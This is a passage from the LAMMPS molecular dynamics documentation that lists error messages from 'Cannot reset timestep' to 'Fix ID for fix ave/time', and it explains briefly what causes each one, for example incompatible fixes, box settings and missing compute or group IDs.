<DT><I>Cannot reset timestep with a time-dependent fix defined</I>
<DD>You cannot reset the timestep when a fix that keeps track of elapsed
time is in place.
<DT><I>Cannot reset timestep with dump file already written to</I>
<DD>Changing the timestep will confuse when a dump file is written. Use
the undump command, then restart the dump file.
<DT><I>Cannot reset timestep with restart file already written</I>
<DD>Changing the timestep will confuse when a restart file is written.
Use the "restart 0" command to turn off restarts, then start them
again.
<DT><I>Cannot restart fix rigid/nvt with different # of chains</I>
<DD>This is because the restart file contains per-chain info.
<DT><I>Cannot run 2d simulation with nonperiodic Z dimension</I>
<DD>Use the boundary command to make the z dimension periodic in order to
run a 2d simulation.
<DT><I>Cannot set both respa pair and inner/middle/outer</I>
<DD>In the rRESPA integrator, you must compute pairwise potentials either
all together (pair), or in pieces (inner/middle/outer). You can't do
both.
<DT><I>Cannot set both vel and wiggle in fix wall command</I>
<DD>Self-explantory.
<DT><I>Cannot set dipole for this atom style</I>
<DD>This atom style does not support dipole settings for each atom type.
<DT><I>Cannot set dump_modify flush for dump xtc</I>
<DD>Self-explanatory.
<DT><I>Cannot set mass for this atom style</I>
<DD>This atom style does not support mass settings for each atom type.
Instead they are defined on a per-atom basis in the data file.
<DT><I>Cannot set respa middle without inner/outer</I>
<DD>In the rRESPA integrator, you must define both a inner and outer
setting in order to use a middle setting.
<DT><I>Cannot set shape for this atom style</I>
<DD>The atom style does not support this setting.
<DT><I>Cannot set this attribute for this atom style</I>
<DD>The attribute being set does not exist for the defined atom style.
<DT><I>Cannot skew triclinic box in z for 2d simulation</I>
<DD>Self-explanatory.
<DT><I>Cannot use Ewald with 2d simulation</I>
<DD>The kspace style ewald cannot be used in 2d simulations. You can use
2d Ewald in a 3d simulation; see the kspace_modify command.
<DT><I>Cannot use Ewald with triclinic box</I>
<DD>This feature is not yet supported.
<DT><I>Cannot use NEB unless atom map exists</I>
<DD>Use the atom_modify command to create an atom map.
<DT><I>Cannot use NEB with a single replica</I>
<DD>Self-explanatory.
<DT><I>Cannot use NEB with atom_modify sort enabled</I>
<DD>This is current restriction for NEB implemented in LAMMPS.
<DT><I>Cannot use PPPM with 2d simulation</I>
<DD>The kspace style pppm cannot be used in 2d simulations. You can use
2d PPPM in a 3d simulation; see the kspace_modify command.
<DT><I>Cannot use PRD with a time-dependent fix defined</I>
<DD>PRD alters the timestep in ways that will mess up these fixes.
<DT><I>Cannot use PRD with a time-dependent region defined</I>
<DD>PRD alters the timestep in ways that will mess up these regions.
<DT><I>Cannot use PRD with atom_modify sort enabled</I>
<DD>This is a current restriction of PRD. You must turn off sorting,
which is enabled by default, via the atom_modify command.
<DT><I>Cannot use PRD with multi-processor replicas unless atom map exists</I>
<DD>Use the atom_modify command to create an atom map.
<DT><I>Cannot use a damped dynamics min style with fix box/relax</I>
<DD>This is a current restriction in LAMMPS. Use another minimizer
style.
<DT><I>Cannot use a damped dynamics min style with per-atom DOF</I>
<DD>This is a current restriction in LAMMPS. Use another minimizer
style.
<DT><I>Cannot use delete_atoms unless atoms have IDs</I>
<DD>Your atoms do not have IDs, so the delete_atoms command cannot be
used.
<DT><I>Cannot use delete_bonds with non-molecular system</I>
<DD>Your choice of atom style does not have bonds.
<DT><I>Cannot use fix TMD unless atom map exists</I>
<DD>Using this fix requires the ability to lookup an atom index, which is
provided by an atom map. An atom map does not exist (by default) for
non-molecular problems. Using the atom_modify map command will force
an atom map to be created.
<DT><I>Cannot use fix bond/break with non-molecular systems</I>
<DD>Self-explanatory.
<DT><I>Cannot use fix bond/create with non-molecular systems</I>
<DD>Self-explanatory.
<DT><I>Cannot use fix box/relax on a 2nd non-periodic dimension</I>
<DD>When specifying an off-diagonal pressure component, the 2nd of the two
dimensions must be periodic. E.g. if the xy component is specified,
then the y dimension must be periodic.
<DT><I>Cannot use fix box/relax on a non-periodic dimension</I>
<DD>When specifying a diagonal pressure component, the dimension must be
periodic.
<DT><I>Cannot use fix deform on a 2nd non-periodic boundary</I>
<DD>When specifying a tilt factor change, the 2nd of the two dimensions
must be periodic. E.g. if the xy tilt is specified, then the y
dimension must be periodic.
<DT><I>Cannot use fix deform on a non-periodic boundary</I>
<DD>When specifying a change is a box dimension, the dimension must be
periodic.
<DT><I>Cannot use fix deform trate on a box with zero tilt</I>
<DD>The trate style alters the current strain.
<DT><I>Cannot use fix enforce2d with 3d simulation</I>
<DD>Self-explanatory.
<DT><I>Cannot use fix msst without per-type mass defined</I>
<DD>Self-explanatory.
<DT><I>Cannot use fix npt and fix deform on same component of stress tensor</I>
<DD>This would be changing the same box dimension twice.
<DT><I>Cannot use fix nvt/npt/nph on a 2nd non-periodic dimension</I>
<DD>When specifying an off-diagonal pressure component, the 2nd of the two
dimensions must be periodic. E.g. if the xy component is specified,
then the y dimension must be periodic.
<DT><I>Cannot use fix nvt/npt/nph on a non-periodic dimension</I>
<DD>When specifying a diagonal pressure component, the dimension must be
periodic.
<DT><I>Cannot use fix pour with triclinic box</I>
<DD>This feature is not yet supported.
<DT><I>Cannot use fix press/berendsen and fix deform on same component of stress tensor</I>
<DD>These commands both change the box size/shape, so you cannot use both
together.
<DT><I>Cannot use fix press/berendsen on a non-periodic dimension</I>
<DD>Self-explanatory.
<DT><I>Cannot use fix press/berendsen with triclinic box</I>
<DD>Self-explanatory.
<DT><I>Cannot use fix reax/bonds without pair_style reax</I>
<DD>Self-explantory.
<DT><I>Cannot use fix shake with non-molecular system</I>
<DD>Your choice of atom style does not have bonds.
<DT><I>Cannot use fix ttm with 2d simulation</I>
<DD>This is a current restriction of this fix due to the grid it creates.
<DT><I>Cannot use fix ttm with triclinic box</I>
<DD>This is a current restriction of this fix due to the grid it creates.
<DT><I>Cannot use fix wall in periodic dimension</I>
<DD>Self-explanatory.
<DT><I>Cannot use fix wall zlo/zhi for a 2d simulation</I>
<DD>Self-explanatory.
<DT><I>Cannot use kspace solver on system with no charge</I>
<DD>No atoms in system have a non-zero charge.
<DT><I>Cannot use neighbor bins - box size << cutoff</I>
<DD>Too many neighbor bins will be created. This typically happens when
the simulation box is very small in some dimension, compared to the
neighbor cutoff. Use the "nsq" style instead of "bin" style.
<DT><I>Cannot use newton pair with GPU GayBerne pair style</I>
<DD>Self-explanatory.
<DT><I>Cannot use newton pair with GPU lj/cut pair style</I>
<DD>Self-explanatory.
<DT><I>Cannot use nonperiodic boundares with fix ttm</I>
<DD>This fix requires a fully periodic simulation box.
<DT><I>Cannot use nonperiodic boundaries with Ewald</I>
<DD>For kspace style ewald, all 3 dimensions must have periodic boundaries
unless you use the kspace_modify command to define a 2d slab with a
non-periodic z dimension.
<DT><I>Cannot use nonperiodic boundaries with PPPM</I>
<DD>For kspace style pppm, all 3 dimensions must have periodic boundaries
unless you use the kspace_modify command to define a 2d slab with a
non-periodic z dimension.
<DT><I>Cannot use pair hybrid with multiple GPU pair styles</I>
<DD>Self-explanatory.
<DT><I>Cannot use pair tail corrections with 2d simulations</I>
<DD>The correction factors are only currently defined for 3d systems.
<DT><I>Cannot use ramp in variable formula between runs</I>
<DD>This is because the ramp() function is time dependent.
<DT><I>Cannot use region INF or EDGE when box does not exist</I>
<DD>Regions that extend to the box boundaries can only be used after the
create_box command has been used.
<DT><I>Cannot use set atom with no atom IDs defined</I>
<DD>Atom IDs are not defined, so they cannot be used to identify an atom.
<DT><I>Cannot use variable energy with constant force in fix addforce</I>
<DD>This is because for constant force, LAMMPS can compute the change
in energy directly.
<DT><I>Cannot use variable every setting for dump dcd</I>
<DD>The format of DCD dump files requires snapshots be output
at a constant frequency.
<DT><I>Cannot use velocity create loop all unless atoms have IDs</I>
<DD>Atoms in the simulation to do not have IDs, so this style
of velocity creation cannot be performed.
<DT><I>Cannot use wall in periodic dimension</I>
<DD>Self-explanatory.
<DT><I>Cannot wiggle and shear fix wall/gran</I>
<DD>Cannot specify both options at the same time.
<DT><I>Cannot zero momentum of 0 atoms</I>
<DD>The collection of atoms for which momentum is being computed has no
atoms.
<DT><I>Change_box command before simulation box is defined</I>
<DD>Self-explanatory.
<DT><I>Change_box operation is invalid</I>
<DD>Cannot change orthogonal box to orthogonal or a triclinic box to
triclinic.
<DT><I>Communicate group != atom_modify first group</I>
<DD>Self-explanatory.
<DT><I>Compute ID for compute reduce does not exist</I>
<DD>Self-explanatory.
<DT><I>Compute ID for fix ave/atom does not exist</I>
<DD>Self-explanatory.
<DT><I>Compute ID for fix ave/correlate does not exist</I>
<DD>Self-explanatory.
<DT><I>Compute ID for fix ave/histo does not exist</I>
<DD>Self-explanatory.
<DT><I>Compute ID for fix ave/spatial does not exist</I>
<DD>Self-explanatory.
<DT><I>Compute ID for fix ave/time does not exist</I>
<DD>Self-explanatory.
<DT><I>Compute ID for fix store/state does not exist</I>
<DD>Self-explanatory.
<DT><I>Compute ID must be alphanumeric or underscore characters</I>
<DD>Self-explanatory.
<DT><I>Compute angle/local used when angles are not allowed</I>
<DD>The atom style does not support angles.
<DT><I>Compute bond/local used when bonds are not allowed</I>
<DD>The atom style does not support bonds.
<DT><I>Compute centro/atom requires a pair style be defined</I>
<DD>This is because the computation of the centro-symmetry values
uses a pairwise neighbor list.
<DT><I>Compute cna/atom cutoff is longer than pairwise cutoff</I>
<DD>Self-explantory.
<DT><I>Compute cna/atom requires a pair style be defined</I>
<DD>Self-explantory.
<DT><I>Compute com/molecule requires molecular atom style</I>
<DD>Self-explanatory.
<DT><I>Compute coord/atom cutoff is longer than pairwise cutoff</I>
<DD>Cannot compute coordination at distances longer than the pair cutoff,
since those atoms are not in the neighbor list.
<DT><I>Compute coord/atom requires a pair style be defined</I>
<DD>Self-explantory.
<DT><I>Compute damage/atom requires peridynamic potential</I>
<DD>Damage is a Peridynamic-specific metric. It requires you
to be running a Peridynamics simulation.
<DT><I>Compute dihedral/local used when dihedrals are not allowed</I>
<DD>The atom style does not support dihedrals.
<DT><I>Compute does not allow an extra compute or fix to be reset</I>
<DD>This is an internal LAMMPS error. Please report it to the
developers.
<DT><I>Compute erotate/asphere cannot be used with atom attributes diameter or rmass</I>
<DD>These attributes override the shape and mass settings, so cannot be
used.
<DT><I>Compute erotate/asphere requires atom attributes angmom, quat, shape</I>
<DD>An atom style that defines these attributes must be used.
<DT><I>Compute erotate/asphere requires extended particles</I>
<DD>This compute cannot be used with point paritlces.
<DT><I>Compute erotate/sphere requires atom attribute omega</I>
<DD>An atom style that defines this attribute must be used.
<DT><I>Compute erotate/sphere requires atom attribute radius or shape</I>
<DD>An atom style that defines these attributes must be used.
<DT><I>Compute erotate/sphere requires spherical particle shapes</I>
<DD>Self-explanatory.
<DT><I>Compute event/displace has invalid fix event assigned</I>
<DD>This is an internal LAMMPS error. Please report it to the
developers.
<DT><I>Compute group/group group ID does not exist</I>
<DD>Self-explanatory.
<DT><I>Compute gyration/molecule requires molecular atom style</I>
<DD>Self-explanatory.
<DT><I>Compute heat/flux compute ID does not compute ke/atom</I>
<DD>Self-explanatory.
<DT><I>Compute heat/flux compute ID does not compute pe/atom</I>
<DD>Self-explanatory.
<DT><I>Compute heat/flux compute ID does not compute stress/atom</I>
<DD>Self-explanatory.
<DT><I>Compute improper/local used when impropers are not allowed</I>
<DD>The atom style does not support impropers.
<DT><I>Compute msd/molecule requires molecular atom style</I>
<DD>Self-explanatory.
<DT><I>Compute pe must use group all</I>
<DD>Energies computed by potentials (pair, bond, etc) are computed on all
atoms.
<DT><I>Compute pressure must use group all</I>
<DD>Virial contributions computed by potentials (pair, bond, etc) are
computed on all atoms.
<DT><I>Compute pressure temperature ID does not compute temperature</I>
<DD>The compute ID assigned to a pressure computation must compute
temperature.
<DT><I>Compute property/atom for atom property that isn't allocated</I>
<DD>Self-explanatory.
<DT><I>Compute property/local cannot use these inputs together</I>
<DD>Only inputs that generate the same number of datums can be used
togther. E.g. bond and angle quantities cannot be mixed.
<DT><I>Compute property/local for property that isn't allocated</I>
<DD>Self-explanatory.
<DT><I>Compute property/molecule requires molecular atom style</I>
<DD>Self-explanatory.
<DT><I>Compute rdf requires a pair style be defined</I>
<DD>Self-explanatory.
<DT><I>Compute reduce compute array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Compute reduce compute calculates global values</I>
<DD>A compute that calculates peratom or local values is required.
<DT><I>Compute reduce compute does not calculate a local array</I>
<DD>Self-explanatory.
<DT><I>Compute reduce compute does not calculate a local vector</I>
<DD>Self-explanatory.
<DT><I>Compute reduce compute does not calculate a per-atom array</I>
<DD>Self-explanatory.
<DT><I>Compute reduce compute does not calculate a per-atom vector</I>
<DD>Self-explanatory.
<DT><I>Compute reduce fix array is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Compute reduce fix calculates global values</I>
<DD>A fix that calculates peratom or local values is required.
<DT><I>Compute reduce fix does not calculate a local array</I>
<DD>Self-explanatory.
<DT><I>Compute reduce fix does not calculate a local vector</I>
<DD>Self-explanatory.
<DT><I>Compute reduce fix does not calculate a per-atom array</I>
<DD>Self-explanatory.
<DT><I>Compute reduce fix does not calculate a per-atom vector</I>
<DD>Self-explanatory.
<DT><I>Compute reduce replace requires min or max mode</I>
<DD>Self-explanatory.
<DT><I>Compute reduce variable is not atom-style variable</I>
<DD>Self-explanatory.
<DT><I>Compute temp/asphere cannot be used with atom attributes diameter or rmass</I>
<DD>These attributes override the shape and mass settings, so cannot be
used.
<DT><I>Compute temp/asphere requires atom attributes angmom, quat, shape</I>
<DD>An atom style that defines these attributes must be used.
<DT><I>Compute temp/asphere requires extended particles</I>
<DD>This compute cannot be used with point paritlces.
<DT><I>Compute temp/partial cannot use vz for 2d systemx</I>
<DD>Self-explanatory.
<DT><I>Compute temp/profile cannot bin z for 2d systems</I>
<DD>Self-explanatory.
<DT><I>Compute temp/profile cannot use vz for 2d systemx</I>
<DD>Self-explanatory.
<DT><I>Compute temp/sphere requires atom attribute omega</I>
<DD>An atom style that defines this attribute must be used.
<DT><I>Compute temp/sphere requires atom attribute radius or shape</I>
<DD>An atom style that defines these attributes must be used.
<DT><I>Compute temp/sphere requires spherical particle shapes</I>
<DD>Self-explanatory.
<DT><I>Compute used in variable between runs is not current</I>
<DD>Computes cannot be invoked by a variable in between runs. Thus they
must have been evaluated on the last timestep of the previous run in
order for their value(s) to be accessed. See the doc page for the
variable command for more info.
<DT><I>Compute used in variable thermo keyword between runs is not current</I>
<DD>Some thermo keywords rely on a compute to calculate their value(s).
Computes cannot be invoked by a variable in between runs. Thus they
must have been evaluated on the last timestep of the previous run in
order for their value(s) to be accessed. See the doc page for the
variable command for more info.
<DT><I>Computed temperature for fix temp/berendsen cannot be 0.0</I>
<DD>Self-explanatory.
<DT><I>Computed temperature for fix temp/rescale cannot be 0.0</I>
<DD>Cannot rescale the temperature to a new value if the current
temperature is 0.0.
<DT><I>Could not count initial bonds in fix bond/create</I>
<DD>Could not find one of the atoms in a bond on this processor.
<DT><I>Could not create 3d FFT plan</I>
<DD>The FFT setup in pppm failed.
<DT><I>Could not create 3d remap plan</I>
<DD>The FFT setup in pppm failed.
<DT><I>Could not find atom_modify first group ID</I>
<DD>Self-explanatory.
<DT><I>Could not find compute ID for PRD</I>
<DD>Self-explanatory.
<DT><I>Could not find compute ID for temperature bias</I>
<DD>Self-explanatory.
<DT><I>Could not find compute ID to delete</I>
<DD>Self-explanatory.
<DT><I>Could not find compute displace/atom fix ID</I>
<DD>Self-explanatory.
<DT><I>Could not find compute event/displace fix ID</I>
<DD>Self-explanatory.
<DT><I>Could not find compute group ID</I>
<DD>Self-explanatory.
<DT><I>Could not find compute heat/flux compute ID</I>
<DD>Self-explanatory.
<DT><I>Could not find compute msd fix ID</I>
<DD>Self-explanatory.
<DT><I>Could not find compute pressure temperature ID</I>
<DD>The compute ID for calculating temperature does not exist.
<DT><I>Could not find compute_modify ID</I>
<DD>Self-explanatory.
<DT><I>Could not find delete_atoms group ID</I>
<DD>Group ID used in the delete_atoms command does not exist.
<DT><I>Could not find delete_atoms region ID</I>
<DD>Region ID used in the delete_atoms command does not exist.
<DT><I>Could not find displace_atoms group ID</I>
<DD>Group ID used in the displace_atoms command does not exist.
<DT><I>Could not find displace_box group ID</I>
<DD>Group ID used in the displace_box command does not exist.
<DT><I>Could not find dump cfg compute ID</I>
<DD>Self-explanatory.
<DT><I>Could not find dump cfg fix ID</I>
<DD>Self-explanatory.
<DT><I>Could not find dump cfg variable name</I>
<DD>Self-explanatory.
<DT><I>Could not find dump custom compute ID</I>
<DD>The compute ID needed by dump custom to compute a per-atom quantity
does not exist.
<DT><I>Could not find dump custom fix ID</I>
<DD>Self-explanatory.
<DT><I>Could not find dump custom variable name</I>
<DD>Self-explanatory.
<DT><I>Could not find dump group ID</I>
<DD>A group ID used in the dump command does not exist.
<DT><I>Could not find dump local compute ID</I>
<DD>Self-explanatory.
<DT><I>Could not find dump local fix ID</I>
<DD>Self-explanatory.
<DT><I>Could not find dump modify compute ID</I>
<DD>Self-explanatory.
<DT><I>Could not find dump modify fix ID</I>
<DD>Self-explanatory.
<DT><I>Could not find dump modify variable name</I>
<DD>Self-explanatory.
<DT><I>Could not find fix ID to delete</I>
<DD>Self-explanatory.
<DT><I>Could not find fix group ID</I>
<DD>A group ID used in the fix command does not exist.
<DT><I>Could not find fix msst compute ID</I>
<DD>Self-explanatory.
<DT><I>Could not find fix poems group ID</I>
<DD>A group ID used in the fix poems command does not exist.
<DT><I>Could not find fix recenter group ID</I>
<DD>A group ID used in the fix recenter command does not exist.
<DT><I>Could not find fix rigid group ID</I>
<DD>A group ID used in the fix rigid command does not exist.
<DT><I>Could not find fix srd group ID</I>
<DD>Self-explanatory.
<DT><I>Could not find fix_modify ID</I>
<DD>A fix ID used in the fix_modify command does not exist.
<DT><I>Could not find fix_modify pressure ID</I>
<DD>The compute ID for computing pressure does not exist.
<DT><I>Could not find fix_modify temperature ID</I>
<DD>The compute ID for computing temperature does not exist.
<DT><I>Could not find group delete group ID</I>
<DD>Self-explanatory.
<DT><I>Could not find set group ID</I>
<DD>Group ID specified in set command does not exist.
<DT><I>Could not find thermo compute ID</I>
<DD>Compute ID specified in thermo_style command does not exist.
<DT><I>Could not find thermo custom compute ID</I>
<DD>The compute ID needed by thermo style custom to compute a requested
quantity does not exist.
<DT><I>Could not find thermo custom fix ID</I>
<DD>The fix ID needed by thermo style custom to compute a requested
quantity does not exist.
<DT><I>Could not find thermo custom variable name</I>
<DD>Self-explanatory.
<DT><I>Could not find thermo fix ID</I>
<DD>Fix ID specified in thermo_style command does not exist.
<DT><I>Could not find thermo_modify pressure ID</I>
<DD>The compute ID needed by thermo style custom to compute pressure does
not exist.
<DT><I>Could not find thermo_modify temperature ID</I>
<DD>The compute ID needed by thermo style custom to compute temperature does
not exist.
<DT><I>Could not find undump ID</I>
<DD>A dump ID used in the undump command does not exist.
<DT><I>Could not find velocity group ID</I>
<DD>A group ID used in the velocity command does not exist.
<DT><I>Could not find velocity temperature ID</I>
<DD>The compute ID needed by the velocity command to compute temperature
does not exist.
<DT><I>Could not grab element entry from EIM potential file</I>
<DD>Self-explanatory
<DT><I>Could not grab global entry from EIM potential file</I>
<DD>Self-explanatory.
<DT><I>Could not grab pair entry from EIM potential file</I>
<DD>Self-explanatory.
<DT><I>Could not set finite-size particle attribute in fix rigid</I>
<DD>The particle has a finite size but its attributes could not be
determined.
<DT><I>Coulomb cutoffs of pair hybrid sub-styles do not match</I>
<DD>If using a Kspace solver, all Coulomb cutoffs of long pair styles must
be the same.
<DT><I>Cound not find dump_modify ID</I>
<DD>Self-explanatory.
<DT><I>Create_atoms command before simulation box is defined</I>
<DD>The create_atoms command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Create_atoms region ID does not exist</I>
<DD>A region ID used in the create_atoms command does not exist.
<DT><I>Create_box region ID does not exist</I>
<DD>A region ID used in the create_box command does not exist.
<DT><I>Create_box region does not support a bounding box</I>
<DD>Not all regions represent bounded volumes. You cannot use
such a region with the create_box command.
<DT><I>Cyclic loop in joint connections</I>
<DD>Fix poems cannot (yet) work with coupled bodies whose joints connect
the bodies in a ring (or cycle).
<DT><I>Degenerate lattice primitive vectors</I>
<DD>Invalid set of 3 lattice vectors for lattice command.
<DT><I>Delete region ID does not exist</I>
<DD>Self-explanatory.
<DT><I>Delete_atoms command before simulation box is defined</I>
<DD>The delete_atoms command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Delete_atoms cutoff > neighbor cutoff</I>
<DD>Cannot delete atoms further away than a processor knows about.
<DT><I>Delete_atoms requires a pair style be defined</I>
<DD>This is because atom deletion within a cutoff uses a pairwise
neighbor list.
<DT><I>Delete_bonds command before simulation box is defined</I>
<DD>The delete_bonds command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Delete_bonds command with no atoms existing</I>
<DD>No atoms are yet defined so the delete_bonds command cannot be used.
<DT><I>Deposition region extends outside simulation box</I>
<DD>Self-explanatory.
<DT><I>Did not assign all atoms correctly</I>
<DD>Atoms read in from a data file were not assigned correctly to
processors. This is likely due to some atom coordinates being
outside a non-periodic simulation box.
<DT><I>Did not find all elements in MEAM library file</I>
<DD>The requested elements were not found in the MEAM file.
<DT><I>Did not find fix shake partner info</I>
<DD>Could not find bond partners implied by fix shake command. This error
can be triggered if the delete_bonds command was used before fix
shake, and it removed bonds without resetting the 1-2, 1-3, 1-4
weighting list via the special keyword.
<DT><I>Did not find keyword in table file</I>
<DD>Keyword used in pair_coeff command was not found in table file.
<DT><I>Did not set temp for fix rigid/nvt</I>
<DD>The temp keyword must be used.
<DT><I>Dihedral atom missing in delete_bonds</I>
<DD>The delete_bonds command cannot find one or more atoms in a particular
dihedral on a particular processor. The pairwise cutoff is too short
or the atoms are too far apart to make a valid dihedral.
<DT><I>Dihedral atom missing in set command</I>
<DD>The set command cannot find one or more atoms in a particular dihedral
on a particular processor. The pairwise cutoff is too short or the
atoms are too far apart to make a valid dihedral.
<DT><I>Dihedral atoms %d %d %d %d missing on proc %d at step %d</I>
<DD>One or more of 4 atoms needed to compute a particular dihedral are
missing on this processor. Typically this is because the pairwise
cutoff is set too short or the dihedral has blown apart and an atom is
too far away.
<DT><I>Dihedral charmm is incompatible with Pair style</I>
<DD>Dihedral style charmm must be used with a pair style charmm
in order for the 1-4 epsilon/sigma parameters to be defined.
<DT><I>Dihedral coeff for hybrid has invalid style</I>
<DD>Dihedral style hybrid uses another dihedral style as one of its
coefficients. The dihedral style used in the dihedral_coeff command
or read from a restart file is not recognized.
<DT><I>Dihedral coeffs are not set</I>
<DD>No dihedral coefficients have been assigned in the data file or via
the dihedral_coeff command.
<DT><I>Dihedral style hybrid cannot have hybrid as an argument</I>
<DD>Self-explanatory.
<DT><I>Dihedral style hybrid cannot have none as an argument</I>
<DD>Self-explanatory.
<DT><I>Dihedral style hybrid cannot use same dihedral style twice</I>
<DD>Self-explanatory.
<DT><I>Dihedral_coeff command before dihedral_style is defined</I>
<DD>Coefficients cannot be set in the data file or via the dihedral_coeff
command until an dihedral_style has been assigned.
<DT><I>Dihedral_coeff command before simulation box is defined</I>
<DD>The dihedral_coeff command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Dihedral_coeff command when no dihedrals allowed</I>
<DD>The chosen atom style does not allow for dihedrals to be defined.
<DT><I>Dihedral_style command when no dihedrals allowed</I>
<DD>The chosen atom style does not allow for dihedrals to be defined.
<DT><I>Dihedrals assigned incorrectly</I>
<DD>Dihedrals read in from the data file were not assigned correctly to
atoms. This means there is something invalid about the topology
definitions.
<DT><I>Dihedrals defined but no dihedral types</I>
<DD>The data file header lists dihedrals but no dihedral types.
<DT><I>Dimension command after simulation box is defined</I>
<DD>The dimension command cannot be used after a read_data,
read_restart, or create_box command.
<DT><I>Dipole command before simulation box is defined</I>
<DD>The dipole command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Displace_atoms command before simulation box is defined</I>
<DD>The displace_atoms command cannot be used before a read_data,
read_restart, or create_box command.
<DT><I>Displace_box command before simulation box is defined</I>
<DD>Self-explanatory.
<DT><I>Displace_box tilt factors require triclinic box</I>
<DD>Cannot use tilt factors unless the simulation box is
non-orthogonal.
<DT><I>Distance must be > 0 for compute event/displace</I>
<DD>Self-explanatory.
<DT><I>Divide by 0 in influence function of pair peri/lps</I>
<DD>This should not normally occur. It is likely a problem with your
model.
<DT><I>Divide by 0 in variable formula</I>
<DD>Self-explanatory.
<DT><I>Domain too large for neighbor bins</I>
<DD>The domain has become extremely large so that neighbor bins cannot be
used. Most likely, one or more atoms have been blown out of the
simulation box to a great distance.
<DT><I>Dump cfg and fix not computed at compatible times</I>
<DD>The fix must produce per-atom quantities on timesteps that dump cfg
needs them.
<DT><I>Dump cfg arguments must start with 'id type xs ys zs'</I>
<DD>This is a requirement of the CFG output format.
<DT><I>Dump custom and fix not computed at compatible times</I>
<DD>The fix must produce per-atom quantities on timesteps that dump custom
needs them.
<DT><I>Dump custom compute does not calculate per-atom array</I>
<DD>Self-explanatory.
<DT><I>Dump custom compute does not calculate per-atom vector</I>
<DD>Self-explanatory.
<DT><I>Dump custom compute does not compute per-atom info</I>
<DD>Self-explanatory.
<DT><I>Dump custom compute vector is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Dump custom fix does not compute per-atom array</I>
<DD>Self-explanatory.
<DT><I>Dump custom fix does not compute per-atom info</I>
<DD>Self-explanatory.
<DT><I>Dump custom fix does not compute per-atom vector</I>
<DD>Self-explanatory.
<DT><I>Dump custom fix vector is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Dump custom variable is not atom-style variable</I>
<DD>Only atom-style variables generate per-atom quantities, needed for
dump output.
<DT><I>Dump dcd of non-matching # of atoms</I>
<DD>Every snapshot written by dump dcd must contain the same # of atoms.
<DT><I>Dump dcd requires sorting by atom ID</I>
<DD>Use the dump_modify sort command to enable this.
<DT><I>Dump every variable returned a bad timestep</I>
<DD>The variable must return a timestep greater than the current timestep.
<DT><I>Dump in CFG format requires one snapshot per file</I>
<DD>Self-explanatory.
<DT><I>Dump local and fix not computed at compatible times</I>
<DD>The fix must produce per-atom quantities on timesteps that dump local
needs them.
<DT><I>Dump local attributes contain no compute or fix</I>
<DD>Self-explanatory.
<DT><I>Dump local cannot sort by atom ID</I>
<DD>This is because dump local does not really dump per-atom info.
<DT><I>Dump local compute does not calculate local array</I>
<DD>Self-explanatory.
<DT><I>Dump local compute does not calculate local vector</I>
<DD>Self-explanatory.
<DT><I>Dump local compute does not compute local info</I>
<DD>Self-explanatory.
<DT><I>Dump local compute vector is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Dump local count is not consistent across input fields</I>
<DD>Every column of output must be the same length.
<DT><I>Dump local fix does not compute local array</I>
<DD>Self-explanatory.
<DT><I>Dump local fix does not compute local info</I>
<DD>Self-explanatory.
<DT><I>Dump local fix does not compute local vector</I>
<DD>Self-explanatory.
<DT><I>Dump local fix vector is accessed out-of-range</I>
<DD>Self-explanatory.
<DT><I>Dump modify compute ID does not compute per-atom array</I>
<DD>Self-explanatory.
<DT><I>Dump modify compute ID does not compute per-atom info</I>
<DD>Self-explanatory.
<DT><I>Dump modify compute ID does not compute per-atom vector</I>
<DD>Self-explanatory.
<DT><I>Dump modify compute ID vector is not large enough</I>
<DD>Self-explanatory.
<DT><I>Dump modify element names do not match atom types</I>
<DD>Number of element names must equal number of atom types.
<DT><I>Dump modify fix ID does not compute per-atom array</I>
<DD>Self-explanatory.
<DT><I>Dump modify fix ID does not compute per-atom info</I>
<DD>Self-explanatory.
<DT><I>Dump modify fix ID does not compute per-atom vector</I>
<DD>Self-explanatory.
<DT><I>Dump modify fix ID vector is not large enough</I>
<DD>Self-explanatory.
<DT><I>Dump modify variable is not atom-style variable</I>
<DD>Self-explanatory.
<DT><I>Dump sort column is invalid</I>
<DD>Self-explanatory.
<DT><I>Dump xtc requires sorting by atom ID</I>
<DD>Use the dump_modify sort command to enable this.
<DT><I>Dump_modify region ID does not exist</I>
<DD>Self-explanatory.
<DT><I>Dumping an atom property that isn't allocated</I>
<DD>The chosen atom style does not define the per-atom quantity being
dumped.
<DT><I>Dumping an atom quantity that isn't allocated</I>
<DD>Only per-atom quantities that are defined for the atom style being
used are allowed.
<DT><I>Electronic temperature dropped below zero</I>
<DD>Something has gone wrong with the fix ttm electron temperature model.
<DT><I>Empty brackets in variable</I>
<DD>There is no variable syntax that uses empty brackets. Check
the variable doc page.
<DT><I>Energy was not tallied on needed timestep</I>
<DD>You are using a thermo keyword that requires potentials to
have tallied energy, but they didn't on this timestep. See the
variable doc page for ideas on how to make this work.
<DT><I>Expected floating point parameter in input script or data file</I>
<DD>The quantity being read is an integer on non-numeric value.
<DT><I>Expected floating point parameter in variable definition</I>
<DD>The quantity being read is a non-numeric value.
<DT><I>Expected integer parameter in input script or data file</I>
<DD>The quantity being read is a floating point or non-numeric value.
<DT><I>Expected integer parameter in variable definition</I>
<DD>The quantity being read is a floating point or non-numeric value.
<DT><I>Failed to allocate %d bytes for array %s</I>
<DD>Your LAMMPS simulation has run out of memory. You need to run a
smaller simulation or on more processors.
<DT><I>Failed to reallocate %d bytes for array %s</I>
<DD>Your LAMMPS simulation has run out of memory. You need to run a
smaller simulation or on more processors.
<DT><I>Fewer SRD bins than processors in some dimension</I>
<DD>This is not allowed. Make your SRD bin size smaller.
<DT><I>Final box dimension due to fix deform is < 0.0</I>
<DD>Self-explanatory.
<DT><I>Fix ID for compute reduce does not exist</I>
<DD>Self-explanatory.
<DT><I>Fix ID for fix ave/atom does not exist</I>
<DD>Self-explanatory.
<DT><I>Fix ID for fix ave/correlate does not exist</I>
<DD>Self-explanatory.
<DT><I>Fix ID for fix ave/histo does not exist</I>
<DD>Self-explanatory.
<DT><I>Fix ID for fix ave/spatial does not exist</I>
<DD>Self-explanatory.
<DT><I>Fix ID for fix ave/time does not exist</I>
